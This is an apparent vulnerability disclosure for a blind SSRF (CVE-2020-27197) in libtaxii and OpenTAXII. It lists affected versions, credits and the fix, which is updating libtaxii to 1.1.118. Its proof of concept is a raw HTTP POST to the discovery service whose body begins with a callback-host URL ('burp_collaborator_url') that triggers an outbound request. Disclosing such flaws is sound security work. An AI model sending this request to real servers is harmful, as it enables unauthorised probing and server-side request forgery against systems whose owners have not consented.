Libtaxii version <= 1.1.117 & OpenTaxi <=0.2.0 Blind SSRF


Details
========================================================================================
Product: 
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://github.com/eclecticiq/OpenTAXII , https://github.com/TAXIIProject/libtaxii
CVE-ID: CVE-2020-27197


Credits
========================================================================================
Discovered by: Owais Mehtab & Vijay Kota
Kudos: Sergey Polzunov for finding the root cause and pointing out that the issue with Libtaxii <= 1.1.117

Affected Products:
========================================================================================
Libtaxii version <= 1.1.117
OpenTaxi <=0.2.0


Description
========================================================================================
While testing opentaxii platform a blind SSRF issue was identified

https://github.com/TAXIIProject/libtaxii/issues/246
https://github.com/eclecticiq/OpenTAXII/issues/176

Proof of Concept
========================================================================================
POST /services/discovery HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/xml
User-Agent: Cabby 0.1.20
X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Services: urn:taxii.mitre.org:services:1.1
X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0
Content-Type: application/xml
Content-Length: XXX

http://burp_collaborator_url?<taxii_11:Discovery_Request xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1" xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1" message_id="877a5f67-6616-4040-bbc1-5f36efd5a349"/>
 


Solution
========================================================================================
Update libtaxii version to 1.1.118